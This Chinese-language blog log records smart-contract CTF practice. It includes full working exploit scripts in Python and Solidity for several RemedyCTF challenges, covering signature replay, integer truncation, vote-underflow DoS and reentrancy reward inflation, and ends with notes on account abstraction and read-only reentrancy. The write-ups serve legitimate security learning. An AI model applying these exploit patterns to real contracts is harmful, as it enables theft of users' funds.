                "type": "function",
            },
            {
                "inputs": [],
                "name": "symbol",
                "outputs": [{"internalType": "string", "name": "", "type": "string"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "totalSupply",
                "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "to", "type": "address"},
                    {"internalType": "uint256", "name": "amount", "type": "uint256"},
                ],
                "name": "transfer",
                "outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
                "stateMutability": "nonpayable",
                "type": "function",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "from", "type": "address"},
                    {"internalType": "address", "name": "to", "type": "address"},
                    {"internalType": "uint256", "name": "amount", "type": "uint256"},
                ],
                "name": "transferFrom",
                "outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
                "stateMutability": "nonpayable",
                "type": "function",
            },
        ],
    )
    vaultFactory = w3.eth.contract(
        address=vaultFactory_addr,
        abi=[
            {
                "inputs": [
                    {"internalType": "bytes32", "name": "salt_", "type": "bytes32"}
                ],
                "name": "createVault",
                "outputs": [
                    {"internalType": "contract Vault", "name": "", "type": "address"}
                ],
                "stateMutability": "nonpayable",
                "type": "function",
            }
        ],
    )

    print(f"Diamond balance: {diamond.functions.balanceOf(vault_addr).call() = }")
    print("Transferring tokens to accounts...")
    accounts = [
        [Account.from_key(f"0x{hex(i)[2:]:0>64}"), f"0x{hex(i)[2:]:0>64}"]
        for i in range(1, 12)
    ]
    for i in accounts:
        transfer(i[0].address, 10000000000000000)
        print(f"Transferred 10^16 tokens to {i[0].address}")

    # 1. Claim initial tokens
    print("\nClaiming initial tokens...")
    send_transaction(
        challenge.functions.claim(), accounts[0][0], privKey=accounts[0][1]
    )
    balance = hexens_coin.functions.balanceOf(accounts[0][0].address).call()
    print(f"Balance of account 0: {balance}")

    # 2. attack
    print("\nAttacking...")
    if (
        int(hexens_coin.functions.getCurrentVotes(account.address).call())
        < 100000000000000000000000
    ):
        for i in range(10):
            send_transaction(
                hexens_coin.functions.delegate(account.address),
                accounts[i][0],
                privKey=accounts[i][1],
            )
            send_transaction(
                hexens_coin.functions.transfer(
                    accounts[i + 1][0].address, 10000000000000000000000
                ),
                accounts[i][0],
                privKey=accounts[i][1],
            )
            currentVote = hexens_coin.functions.getCurrentVotes(account.address).call()
            print(f"Current votes of account: {currentVote}")

    def deploy_contract(w3, x_abi, x_bin):
        construct_txn = (
            w3.eth.contract(abi=x_abi, bytecode=x_bin)
            .constructor(diamond_addr, hexens_coin_addr)
            .build_transaction(
                {
                    "from": account.address,
                    "nonce": w3.eth.get_transaction_count(account.address),
                }
            )
        )
        tx_create = w3.eth.account.sign_transaction(construct_txn, PRIVATE_KEY)
        tx_hash = w3.eth.send_raw_transaction(tx_create.rawTransaction)
        tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
        print(f"Contract deployed at address: { tx_receipt.contractAddress }")

        return tx_receipt.contractAddress

    x_meta = solcx.compile_files(
        ["x.sol"], output_values=["abi", "bin"], solc_version=_solc_version
    )
    x_abi = x_meta["x.sol:X"]["abi"]
    x_bin = x_meta["x.sol:X"]["bin"]
    x_address = deploy_contract(w3, x_abi, x_bin)
    # x_address = "0xaDFF41E489b5517A26bb2AbF3bE6c960740D4E09"

    # x_instance = w3.eth.contract(address=x_address, abi=x_abi)
    dark_vault = w3.eth.contract(address=vault_addr, abi=x_abi)

    governance_call_function = "governanceCall(bytes)"
    burn_function_signature = "burn(address,uint256)"
    burn_function_signature
    upgradeTo_function_signature = "upgradeTo(address)"
    # Encode the "burn" function calldata
    amount = 31337
    burn_function_selector = w3.keccak(text=burn_function_signature)[
        :4
    ]  # First 4 bytes of the function selector
    encoded_token = w3.to_bytes(
        hexstr=w3.to_checksum_address(diamond_addr)[2:].zfill(64)
    )  # Address encoded to 32 bytes
    encoded_amount = amount.to_bytes(32, byteorder="big")  # Amount encoded to 32 bytes

    calldata = burn_function_selector + encoded_token + encoded_amount
    send_transaction(vault.functions.governanceCall(calldata), account)

    print(f"Diamond balance: {diamond.functions.balanceOf(vault_addr).call() = }")

    # Encode the "upgradeTo" function
    upgradeTo_function_selector = w3.keccak(text=upgradeTo_function_signature)[
        :4
    ]  # First 4 bytes of the function selector
    encoded_token = w3.to_bytes(
        hexstr=w3.to_checksum_address(x_address)[2:].zfill(64)
    )  # Address encoded to 32 bytes

    calldata = upgradeTo_function_selector + encoded_token
    send_transaction(vault.functions.governanceCall(calldata), account)
    # Selfdestruct the vault
    send_transaction(dark_vault.functions._selfdestruct(), account)

    # Create a new vault using vaultFactory
    salt_ = w3.solidity_keccak(
        ["string"],
        ["The tea in Nepal is very hot. But the coffee in Peru is much hotter."],
    )
    send_transaction(vaultFactory.functions.createVault(salt_), account)

    # Initialization, and we can gain ownership of the vault, no need to attack again
    send_transaction(
        dark_vault.functions.initialize(diamond_addr, hexens_coin_addr), account
    )
    # Upgrade to the dark vault again
    send_transaction(vault.functions.governanceCall(calldata), account)

    # Gain diamonds!
    send_transaction(dark_vault.functions.new_sender(), account)

if __name__ == "__main__":
    main()

2025.8.6

欸，RemedyCTF还有一个最简单的题目Rich Man’s Bet，下面是Writeup（附件也不给了）

这题相比前面的Diamond Heist，合约数量大幅降低，但是作为一个治理合约这题难度也不低（虽然也是并列第3高解出的题目）

那么还是老样子，先分析一下合约内容：

AdminNFT.sol是一个基础的ERC1155合约，这种合约支持多个代币的存储和批量转发
Challenge.sol里面包含了我们的最终目标：完成“挑战”并且将跨链桥合约的余额全部转走（虽然这题并没有也不需要跨链），至于挑战就是非常简单的3个数学题，随便代进去几个数就做出来了
核心合约Bridge.sol是一个ERC1155Receiver合约，说明这个合约支持ERC1155的多代币批量转发操作，同时我们也能看到有个onERC1155Received，即接收到ERC1155转入的代币会自动调用该函数，同理还有个onERC1155BatchReceived会在接收到批量转发的代币的时候被调用当然作为治理合约，肯定有治理逻辑，这里就是通过NFT的Power进行治理的：Admin持有的NFT的Power是10000 ether，而一般的NFT只有50 ether，而更改跨链桥设置需要所有签名人的Power大于总数的一半且都为Validator，而最终的withdrawEth则需要所有支持提款的总人数超过阈值（Challenge.sol设定为10）且都在初始设定的withdrawValidator名单中，但是很明显除了合约自己我们谁都不在名单里面…

好的，现在让我们开始做题，首先我们可以很快得到三道数学题的一组合法解，解出来后在Bridge中验证挑战即可完成isSolved的前面2个要求：

def main():
    # 1. Solve the 3 stages
    # Q1: 6  Q2: 59,101  Q3: 1 0 2
    print("\nSolving stages...")
    send_transaction(challenge.functions.solveStage1(6), account)
    print("\nStage 1 completed")
    send_transaction(challenge.functions.solveStage2(59, 101), account)
    print("\nStage 2 completed")
    send_transaction(challenge.functions.solveStage3(1, 0, 2), account)
    print("\nStage 3 completed")

    # 2. Verify challenge
    send_transaction(bridge.functions.verifyChallenge(), account)
    if challenge.functions.challengeSolved().call():
        print("\nChallenge verified")
    else:
        print("\nChallenge failed")

接下来我们进行提款，上面提到了没有人能够提款，因此我们只能尝试让threshold变为0，而唯二能更改threshold的值的地方只有constructor和changeBridgeSettings两个地方，也就是说我们就是得更新设置，那么我们有需要成为Validator，而能成为Validator的地方就只有两个onERC1155(Batch)Received了，也就是说我们就是得向Bridge转入代币…吗？

仔细查看ERC1155的实现，我们发现如果id和amount两个数组为空数组（即转入0种代币）也是会正常调用目标ERC1155Receiver的onERC1155BatchReceived函数的，而Bridge中并没有检测转入的代币种类是否为0，所以我们只需要转入0种代币即可：

make_validator = lambda acc: send_transaction(
    admin_nft.functions.safeBatchTransferFrom(
        acc.address, bridge.address, [], [], w3.to_bytes(text="")
    ),
    acc,
    gas=150000,
)

然后进入到changeBridgeSettings的部分，我们发现验证签名是否有效的时候只会记录lastSigner并和其比对，那么我们只需要有至少2个签名就能进行无限的验证，从而达到刷Power的目的，因此我们只需要再新创建一个地址并让它签一下名就行了，当然前置是需要这个地址也成为Validator；修改的设置中我们只需要修改threshold，但是这个新的threshold必须大于1…看起来没有办法，但是仔细看一下函数传入的数据类型：是一个uint256，而最后使用的threshold是一个uint96，中间进行了一次显式类型转换，也就是说如果我们传入的数很大，类型转换会产生数据丢失，比如我们传入的newThreshold是$$2^{96}$$，那么最后我们会有threshold = uint96(newThreshold) = 0

所以我们根据上面的理论更新完设置后直接withdrawEth就行了，签名列表为空就行，最后的脚本如下：（有些多余的ABI可以删掉，因为没有调用到）

# 3f716403f4394aa3c38997b1aeebed19
# [rich-mans-bet] RPC Endpoints:
# [rich-mans-bet]     - http://46.101.119.98:8545/oeYWbzukdrAnjozjEiXuGxtH/main
# [rich-mans-bet]     - ws://46.101.119.98:8545/oeYWbzukdrAnjozjEiXuGxtH/main/ws
#
# [rich-mans-bet] The Player private key:         0x2f24a9c9f818b1315f24eb909f85cefb6ea66bc31fc77744778acc400d6d3ba0
# [rich-mans-bet] The Challenge contract address: 0x3346B289790b9328b4661193DaEADDcD6a4a5B3a

from web3 import Web3
from eth_account import Account
from eth_account.messages import encode_typed_data, encode_defunct
import eth_abi
import time

RPC_URL = "http://46.101.119.98:8545/emjhmdIoWPlMCHBRzbGAHdBe/main"
w3 = Web3(Web3.HTTPProvider(RPC_URL))

PRIVATE_KEY = "0xc9607d2731ff52283f710a04251fa72f9819b072cd2c44e3f5367c9ee6dbf731"
CHALLENGE_ADDRESS = "0x553c30968D4233048Bd9E2153D442ab24511960B"
account = Account.from_key(PRIVATE_KEY)

def send_transaction(contract_function, account, nonce_offset=0, value=0, gas=500000):
    """Helper function to send transactions"""
    transaction = contract_function.build_transaction(
        {
            "from": account.address,
            "nonce": w3.eth.get_transaction_count(account.address) + nonce_offset,
            "gas": gas,
            "maxFeePerGas": w3.eth.gas_price * 2,
            "maxPriorityFeePerGas": w3.eth.gas_price,
            "value": w3.to_wei(value, "ether"),
        }
    )
    return send_signed(transaction, account)

def send_signed(transaction, account):
    signed_txn = w3.eth.account.sign_transaction(transaction, account.key.hex())
    tx_hash = w3.eth.send_raw_transaction(signed_txn.raw_transaction)
    receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
    return receipt

def init():
    global challenge, bridge, admin_nft
    challenge = w3.eth.contract(
        address=CHALLENGE_ADDRESS,
        abi=[
            # 此处省略abi
        ],
    )

    bridge = w3.eth.contract(
        address=challenge.functions.BRIDGE().call(),
        abi=[
            # 此处省略abi
        ],
    )

    admin_nft = w3.eth.contract(
        address=challenge.functions.ADMIN_NFT().call(),
        abi=[
            # 此处省略abi
        ],
    )

def main():
    # 1. Solve the 3 stages
    # Q1: 6  Q2: 59,101  Q3: 1 0 2
    print("\nSolving stages...")
    send_transaction(challenge.functions.solveStage1(6), account)
    print("\nStage 1 completed")
    send_transaction(challenge.functions.solveStage2(59, 101), account)
    print("\nStage 2 completed")
    send_transaction(challenge.functions.solveStage3(1, 0, 2), account)
    print("\nStage 3 completed")

    # 2. Verify challenge
    send_transaction(bridge.functions.verifyChallenge(), account)
    if challenge.functions.challengeSolved().call():
        print("\nChallenge verified")
    else:
        print("\nChallenge failed")

init()
main()
# print(bridge.functions.threshold().call())
# exit(0)

print(w3.from_wei(w3.eth.get_balance(account.address), "ether"))
make_validator = lambda acc: send_transaction(
    admin_nft.functions.safeBatchTransferFrom(
        acc.address, bridge.address, [], [], w3.to_bytes(text="")
    ),
    acc,
    gas=150000,
)
new_acc = w3.eth.account.create()
print(
    send_signed(
        {
            "to": new_acc.address,
            "value": w3.to_wei("0.03", "ether"),
            "gas": 21000,
            "gasPrice": w3.to_wei("50", "gwei"),
            "chainId": w3.eth.chain_id,  # Mainnet: 1, Goerli: 5, etc.
            "nonce": w3.eth.get_transaction_count(account.address),
        },
        account,
    )
)
print(make_validator(account))
print(make_validator(new_acc))

message = eth_abi.encode(
    ["address", "address", "uint256"], [challenge.address, admin_nft.address, 2**96]
)
signed_message_a = w3.eth.account.sign_message(
    encode_defunct(message), private_key=PRIVATE_KEY
)
signed_message_b = w3.eth.account.sign_message(
    encode_defunct(message), private_key=new_acc.key
)

message_hash = message  # From step 1
receiver = account.address  # Replace with the actual receiver address
amount = 1000000000000000000  # Example amount in wei (1 ETH)
callback = Web3.to_bytes(text="example_callback_data")  # Example callback data

# Prepare the arguments
signatures = [
    signed_message_a.signature,
    signed_message_b.signature,
] * 70
print(
    send_transaction(
        bridge.functions.changeBridgeSettings(message_hash, signatures),
        account,
        gas=3000000,
    )
)

print(
    send_transaction(
        bridge.functions.withdrawEth(
            Web3.to_bytes(b"nyaaaaa".ljust(32)),
            [],
            account.address,
            w3.to_wei(1000, "ether"),
            callback,
        ),
        account,
    )
)

老传统，再接一题吧，同个比赛的题目Frozen Voting：

根据提供的题目合约，我们可以知道ADMIN在mint了一个10000票权的NFT后delegate给了我们自己，同时我们自己有一个1票权的NFT，此时我们的票权为10001；而最后的isSolved会尝试更换delegate并转移走10000票权的NFT，而我们的目标就是阻止这次操作

那么其实很明显了：我们唯一能做的就是在第一步更换delegate的时候做手脚，而NFT在发生所有权变更的时候一定会调用_delegate，而其中的_moveDelegates会减去上一任delegatee的票权并加到下一位那里，因此很简单：我们要想办法通过_delegate让自己的票权小于10000，从而触发整型下溢以实现DoS攻击

经过一点简单的代码审计，我们发现delegateBySig函数有点小小的问题：相比delegate函数，它缺少了对delegatee参数是否为address(0)的确认与操作，从而使得我们可以将自己的NFT通过delegateBySig函数delegate给0x0地址，而根据_moveDelegates函数，此时我们的票权会-1，而没有人的票权会上升（合约误以为我们销毁了NFT），因此此时我们再一次进行delegateBySig或者直接transferFrom给任意的地址即可让我们的票权达到9999，进而实现前面的目的

下面是forge的解题script：

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-ctf/CTFSolver.sol";

import "src/Challenge.sol";

contract Solve is CTFSolver {
    function solve(address challenge, address player) internal override {
        uint256 playerPrivateKey = vm.envOr(
            "PLAYER",
            uint256(
                0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80
            )
        );
        Challenge ch = Challenge(challenge);
        VotingERC721 votingToken = ch.votingToken();

        address delegatee = address(0x0);
        uint256 nonce = votingToken.nonces(player);
        uint256 expiry = block.timestamp + 1 days;
        bytes32 DOMAIN_TYPEHASH = votingToken.DOMAIN_TYPEHASH();
        bytes32 DELEGATION_TYPEHASH = votingToken.DELEGATION_TYPEHASH();
        bytes32 domainSeparator = keccak256(
            abi.encode(
                DOMAIN_TYPEHASH,
                keccak256("VotingERC721"),
                block.chainid,
                address(votingToken)
            )
        );
        bytes32 structHash = keccak256(
            abi.encode(DELEGATION_TYPEHASH, delegatee, nonce, expiry)
        );
        bytes32 digest = keccak256(
            abi.encodePacked("\x19\x01", domainSeparator, structHash)
        );
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(playerPrivateKey, digest);
        votingToken.delegateBySig(delegatee, nonce, expiry, v, r, s);

        address account2 = address(0x1);
        votingToken.transferFrom(player, account2, 123);

        ch.isSolved();
    }
}

2025.8.7

我靠昨天看完沪赛的题目睡过去了，好悬没签上到

今天稍微摆个烂，就只看1题吧，RemedyCTF的Lockdown：

整个题目给我眼睛都看花了，现在还是有点懵，这题能有23解是不是有点变态了（

整个题目设计了一个能质押NFT并获取质押奖励的市场和一个对应的NFT合约，同时大量使用了安全的运算函数以及重入哨兵，代码量也不小，乍看起来十分唬人

但是在Marketplace合约中，我们发现Unstake函数在safeTransferFrom后会进行swapCUSDCforUSDC操作，而传入的参数recipient（prevOwner）和函数中的_iLockToken.ownerOf(tokenId)（NFT实际持有者）可能会不一致，最后导致本应该发放给NFT持有者的奖励被发放给prevOwner，因此我们可以从这里开始下手

同时我们还发现Token中对beforeTokenTransfer的实现存在问题：如果from或者to为市场本身的时候，则不会修改prevOwner，因此假如我们已经让prevOwner获了一次利，此时我们直接再质押并取消后，就能产生双倍利润；除此之外，只有beforeTokenTransfer会修改prevOwner，因此我们需要首先进行一次带onERC721Received的重入操作，在第一次质押并取消的时候触发重入，让prevOwner修改为我们一个Alt Account，此时我们的prevOwner在取消质押的时候就能设置一个虚空的_cUSDCInterest后获取质押奖励；第2次则不需要重入，直接质押并取消即可再次获利，从而翻倍奖励

这里附上榜一大哥们公开的解题脚本，我到现在还有点懵圈所以就没有自己写QAQ

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import {Script, console} from "forge-std/Script.sol";
import "src/interfaces/ILockMarketplace.sol";
import "src/interfaces/ILockToken.sol";
import "src/interfaces/ICERC20.sol";
import "src/interfaces/IComptroller.sol";

interface IChallenge {
    function USDC() external returns (IERC20);
    function CUSDC() external returns (IERC20);
    function COMPTROLLER() external returns (IComptroller);
    function LOCK_MARKETPLACE() external returns (ILockMarketplace);
    function LOCK_TOKEN() external returns (ILockToken);
}

contract Proxy {
    uint256 mode;
    IChallenge public chal;
    ILockMarketplace public m;
    ILockToken public t;
    IERC20 usdc;
    address a;
    address b;
    address c;
    uint160 i;
    uint256 lastTokenId;
    
    constructor(IChallenge _chal) {
        chal = _chal;
        m = chal.LOCK_MARKETPLACE();
        t = chal.LOCK_TOKEN();
        usdc = chal.USDC();
    }

    function mintWithUSDC(address to, uint256 usdcAmount) external returns (uint256) {
        usdc.approve(address(m), usdcAmount);
        return m.mintWithUSDC(to, usdcAmount);
    }

    function stake(uint256 tokenId, uint256 usdcAmount) external {
        t.approve(address(m), tokenId);
        return m.stake(tokenId, usdcAmount);
    }

    function unStake(address to, uint256 tokenId) external {
        return m.unStake(to, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) external {
        t.transferFrom(from, to, tokenId);
    }

    function set_mode(uint256 _mode) external {
        mode = _mode;
    }

    function set_addr_a(address addr) external {
        a = addr;
    }

    function set_addr_b(address addr) external {
        b = addr;
    }

    function set_addr_c(address addr) external {
        c = addr;
    }

    function onERC721Received(address, address, uint256 tokenId, bytes calldata) external returns (bytes4) {
        if (mode == 1) {
            t.transferFrom(address(this), c, tokenId);
            Proxy(c).transferFrom(address(c), a, tokenId);
        }
        lastTokenId = tokenId;
        return this.onERC721Received.selector;
    }

    function claim() external {
        usdc.transfer(msg.sender, usdc.balanceOf(address(this)));

        i += 1;
        t.transferFrom(address(this), address(uint160(address(this)) + i), lastTokenId);
    }

    function withdrawUSDC(uint256 tokenId, uint256 amount) external {
        m.withdrawUSDC(tokenId, amount);
    }

    function redeemCompoundRewards(uint256 tokenId, uint256 rewardAmount) external {
        m.redeemCompoundRewards(tokenId, rewardAmount);
    }
}

contract Exploit {
    IChallenge public chal;
    ILockMarketplace public m;
    IERC20 public usdc;
    IERC20 public cusdc;
    Proxy public a;
    Proxy public b;
    Proxy public c;

    constructor(IChallenge _chal) {
        chal = _chal;
        m = chal.LOCK_MARKETPLACE();
        usdc = chal.USDC();
        cusdc = chal.CUSDC();

        a = new Proxy(_chal);
        b = new Proxy(_chal);
        c = new Proxy(_chal);

        b.set_addr_a(address(a));
        b.set_addr_c(address(c));

        c.set_addr_a(address(a));
        c.set_addr_b(address(b));
    }

    function pwn() external {
        uint256 amount_1;
        uint256 amount_2;
        uint256 tokenId;
        uint256 tokenId2;
        uint256 tokenId3;
        uint256 c_rewards;
        uint256 m_balance;
        uint256 c_deposit;

        for (uint256 i = 0; i < 12; i++) {
            console.log("i", i);

            amount_1 = usdc.balanceOf(address(this)) - 100e6;
            if (i == 11)
                amount_1 = 364921e6 + 101e6;
            amount_2 = 100e6;

            console.log("amount_1", amount_1/1e6);

            usdc.transfer(address(a), amount_1);
            usdc.transfer(address(b), amount_2);

            tokenId = a.mintWithUSDC(address(a), amount_1);
            a.stake(tokenId, amount_1 - 20e6);

            tokenId2 = b.mintWithUSDC(address(b), amount_2);
            b.stake(tokenId2, amount_2 - 20e6);
            b.set_mode(1);
            b.unStake(address(b), tokenId2);
            b.set_mode(0);

            a.transferFrom(address(a), address(b), tokenId2);
            b.withdrawUSDC(tokenId2, m.getDeposit(tokenId2));
            b.claim();

            a.unStake(address(a), tokenId);
            a.withdrawUSDC(tokenId, m.getDeposit(tokenId));
            a.claim();

            // c should have inflated _rewardsBalance
            c_rewards = m.getAvailableRewards(address(c));
            console.log("_rewardsBalance[c]", c_rewards/1e6);

            usdc.transfer(address(c), amount_2);
            tokenId3 = c.mintWithUSDC(address(c), amount_2);
            c_deposit = m.getDeposit(tokenId3);
            if (c_deposit != 0)
                c.withdrawUSDC(tokenId3, c_deposit);
            m_balance = usdc.balanceOf(address(m));
            if (m_balance != 0)
                c.redeemCompoundRewards(tokenId3, c_rewards > m_balance ? m_balance : c_rewards);
            c.claim();

            console.log("balanceOf(this)", usdc.balanceOf(address(this))/1e6);
            console.log("usdc.balanceOf(m)", usdc.balanceOf(address(m))/1e6);
            console.log("cusdc.balanceOf(m)", cusdc.balanceOf(address(m)));
            console.log("cusdc.balanceOf(m) < 0.01e18", cusdc.balanceOf(address(m)) < 0.01e18);
        }

        usdc.transfer(msg.sender, usdc.balanceOf(address(this)));
    }
}

contract ExploitScript is Script {
    uint256 public privateKey = 0x264dc4c5e6f74aa75583dd3e7f8784e072511ab505012e43f8bef980174b6467;
    IChallenge public chal = IChallenge(0xb5284fE2119E23c672A80Ac11B05c67D3c072eAf);

    function setUp() public {}

    function run() public {
        vm.startBroadcast(privateKey);
        Exploit e = new Exploit(chal);
        chal.USDC().transfer(address(e), 500e6);
        e.pwn();
        vm.stopBroadcast();
    }
}

2025.8.8

今天想摆烂，就不刷题了，想着下周要搞个dApp，干脆顺带把下一届新生赛的题目一起出完好了，没几个月了

今天题目设计的进展也不多，就是跟着Chainlink文档搓了个D100用于NFT抽卡，基本上照搬的，不过只是获取随机数而已，谁还不是套个板子就开始跑呢？（笑）

D100在Ethereum Sepolia上的地址：0xA6FAca145A93DC2fAcd749B7303ef950ba2A6d81，已经在Etherscan上Verify了源码，这一个Version还没有添加重置骰子的操作，之后会添加（不然一个人就只能抽1个NFT有点太尴尬了www），后面可能会添加NFT稀有度合成的操作，不过那些都是后面的事了，还得想想在哪个不起眼的地方塞个漏洞进去(o-ωｑ)).oO

Chainlink VRF这个投骰子耗时挺长的，1分钟，还得想想前端页面该怎么搞才能算合理，~~总不能像碧蓝航线搞个造船时间吧（~~

顺带一提，Remix的Verify插件挺逆天的，需要你传入正确的constructor才能Verify，结果传进去一个差不多1e76的数告诉我Overflow（2**256＞1e78），但是在数前面加个0就好了，气笑了

~~运气不好，自己只抽到个R，笑死~~

2025.8.9

周末了，姑且休息一天，明天再战

随便看了一下账户抽象的一些Approach（文章链接：Account Abstraction: Past, Present, Future），准备开始啃EIP了，刚好Pectra已经在使用EIP-4337了，说不准还可以实战测试一下

说白了就是用户对持有的资产的管理和行为不够灵活，所以想要实现所谓的“账户抽象”，最终的目的是让钱包能够执行自定义的代码，而途径无非就两种：

让智能合约能够“主动”发送交易（一般的合约不能主动发送交易，它只是一系列确定且公开的执行逻辑，也就是一个没有电源的电路）
让EOA能够执行代码（一般的EOA的extcodesize为0，这也是过去判断EOA地址和合约地址的一个重要依据）

至于对每种途径提出的EIP等明天再开始看，现在该睡觉了

2025.8.10

嘻嘻，昨天口糊了，Pectra使用的是我们的EIP-7702而非EIP-4337（人家现在还只是草案阶段呢，不过确实是被广泛接受了，23年就已经在主网部署了Entrypoint.sol）

今天先简单写一点ERC4337吧

交易过程的差异

对于一般的EOA账户交易，我们都是使用EOA的私钥对交易数据进行签名，然后账户将这些签名数据发送到以太坊节点进行验证和执行，验证后在链上执行操作

这里就有很多问题：首先就是经典的“私钥即一切”的问题：丢失了私钥那么就彻底丢失了资产以及相关的控制权；同时交易的支付代币只能是ETH，签名算法只能是ECDSA，EOA不够灵活…

因此有人提出了个想法：将Owner（资产持有者），Signer（交易发起者，签署交易）和Gas Payer（手续费支付者）从现有的框架中解耦出来，最终得到的一个结果就是ERC-4337

在此之前有EIP-2938及EIP-3074等提出了解决方案，但是有些方案是中心化的，有些则需要从共识层协议进行改动，需要进行硬分叉，而ERC-4337是在原有框架下实现最大程度的AA的一个方案

ERC-4337新提出了一个叫做UserOperation的一个类交易结构体，里面包含一系列类似普通交易的参数，比如常规的sender和nonce之类的，但是其中有三个新的概念：Bundler，PayMaster和Factory，这里我们稍后提到

这里的UserOperation需要进行签名，不过是可以以其它的签名方式进行签名的，而不仅仅是ECDSA，在签名后会将签名数据发送到一个独立的内存池（Alt mempool），这个内存池只存放UserOperation，然后会有一些支持ERC4337的以太坊节点从池中选出若干个UserOperation进行打包，这些节点就是Bundler（打包者）

验证签名合法性的逻辑需要提前编写在AA Wallet（Account Abstract Wallet，账户抽象钱包）中，以便之后验证签名的合法性

目前为止我们的交易还在链下，接下来就要进行链上操作了：Bundler在打包后会将这些打包后的交易发送到一个Entrypoint合约中进行上链操作，流程如下：

检测AA Wallet是否存在，如果不存在且initCode非空则会通过factory地址进行一个新AA Wallet的部署
调用AA Wallet的函数验证签名合法性
检测PayMaster是否存在抵押在Entrypoint的代币（以防止DoS攻击），且PayMaster余额是否足以垫付交易
调用PayMaster中的函数进行支付检查，比如AA Wallet是否有足够的余额进行交易操作
执行UserOperation中的主要逻辑
返还PayMaster垫付的费用，并向节点支付打包费用

需要注意的是：每条链上的Entrypoint合约是唯一的，主网上的合约地址和实现：Entry Point 0.7.0 | Address: 0x00000000…6f37da032 | Etherscan

通过这种方式，我们可以直接实现自定义签名算法、多签钱包、多笔交易执行、多代币支付手续费等便捷操作，但是由于这种方案一定会发生合约调用，因此gas费会更高，因此其中一个优化方案是利用Layer2

2025.8.11

昨天写了AA的其中一类方案：升级智能合约钱包，使其能够主动发送交易，那今天就写一下另一类方案吧，就选比较有代表性的EIP-7702吧

昨天有关Bundler的表述有些不清楚，实际上那些打包的节点并非以太坊RPC节点，它们只是一系列白名单中的实体，它们只负责将打包后的UserOperation发送到以太坊节点中，可以简单理解为矿工

至于zkSync链原生实现的AA这里就不谈了，交易大致流程是一样的，只是Bundler同时也是以太坊节点

EIP-7702提出了一个新的交易类型0x04（另外三种交易类型0x01~0x03分别对应EIP-2930，EIP-1559和EIP-4844），该交易类型会修改指定地址authority的代码为0xef0100 || address，其中0xef为EIP-3541中定义的被禁用的操作码，这里用于指代执行该地址（记为A）的代码时和执行一般代码要有所区别：需要读取指定地址（记为B）的代码后再在A的上下文中执行（很显然汇编底层上使用的是DELEGATECALL操作码）

整个EIP-7702本质上就是将一个EOA包装成了一个Proxy，而交易类型0x04就是一个setImplementation函数，调用EOA地址的代码本质上就是在和一个Proxy交互，本身是挺不错的，不过如果同一个地址通过EIP-7702进行多次代码设置，那么执行代码的时候会不会出现和delegatecall()一样的问题呢？比如经典的存储内变量排布问题…

除此之外，由于部署合约时initCode是即用即删的，因此实际上我们无法在设置代码的同时进行初始化，而是必须要在设置结束后再额外进行一次初始化，这可能会是一部分额外的gas费用

好消息是经过EIP-7702设置代码的EOA地址，其EXTCODESIZE大小固定为23（len(0xef0100 || address)），且CODESIZE返回的为指定地址address的CODESIZE，因此本质上extcodesize检查稍微改动一点还是勉强能用的，但是如果攻击者通过汇编构造合约代码的话…那就另当别论了（笑）

根据EIP规范文档，整个EIP-7702交易的Gas费用消耗为21000 + 16 * non-zero calldata bytes + 4 * zero calldata bytes + 1900 * access list storage key count + 2400 * access list address count，额外加上PER_EMPTY_ACCOUNT_COST * authorization list length以及对交易执行过程中特定地址的冷/热读取费用

说了这么多，实际上整个EIP-7702是一个非常大胆的尝试，因为让EOA本身能够执行代码逻辑这件事就很危险，攻击者可能会通过一系列伪造执行恶意操作（比如设置一个智能钱包，但是你往里面存钱就会调用某个EOA的代码从而窃取虚拟资产之类的），而且本身此方案如果涉及到跨链层面还会有更多问题，因此可能需要额外的EIP进行f

2025.8.12

这一周刚好从今天开始连续5天都有事没啥空，希望能尽量挤出点时间来水下签到，别似了（笑）

想到自己之前的博客还有坑没填完，这里填一下，之后找个时间从这里填回去，今天就只写一个只读重入（Read-only Reentrancy）攻击吧（其它的重入攻击或多或少写过一点，除了Double Entrypoint）

漏洞合约和攻击合约源码来自DeFiVulnLabs/src/test/ReadOnlyReentrancy.sol at main · SunWeb3Sec/DeFiVulnLabs

本质上重入攻击的攻击点就是在于合约状态变量和现实情况之间的差别，通常是合约状态变量没能赶上现实情况的变化，从而导致攻击者能够利用虚假的变量值进行一些操作

只读重入也是类似的，差别是漏洞合约过分信任被view修饰的函数，比如主网上的案例：Lido: Curve Liquidity Farming Pool Contract | Address: 0xDC24316b…Ea0f67022 | Etherscan

假定我们有一个依赖于上面的合约的get_virtual_price函数提供奖励的质押合约：

// VulnContract
// users stake LP_TOKEN
// getReward rewards the users based on the current price of the pool LP token
contract VulnContract {
    IERC20 public constant token = IERC20(LP_TOKEN);
    ICurve private constant pool = ICurve(STETH_POOL);

    mapping(address => uint) public balanceOf;

    function stake(uint amount) external {
        token.transferFrom(msg.sender, address(this), amount);
        balanceOf[msg.sender] += amount;
    }

    function unstake(uint amount) external {
        balanceOf[msg.sender] -= amount;
        token.transfer(msg.sender, amount);
    }

    function getReward() external view returns (uint) {
        //rewarding tokens based on the current virtual price of the pool LP token
        uint reward = (balanceOf[msg.sender] * pool.get_virtual_price()) /
            1 ether;
        // Omitting code to transfer reward tokens
        return reward;
    }
}

那么我们可以通过往Pool先add_liquidity然后remove_liquidity，此时根据Pool源码，我们发现Pool会首先burn掉代币然后进行转账，那么此时由于total_supply降低，此时会导致get_virtual_price临时升高，最终导致我们的getReward返回更多的奖励

中途虚拟价格发生的变化就是这样的表格：

阶段	LP代币总量	基础代币余额	D值	虚拟价格
初始	X	Y	D0	P0 = D0/X
销毁后	X’ = X-ΔX	Y	D0	P1 = D0/(X-ΔX) (临时升高)
转账后	X-ΔX	Y-ΔY	D1 ≈ D0*(X-ΔX)/X	P2 ≈ D0/X (恢复)

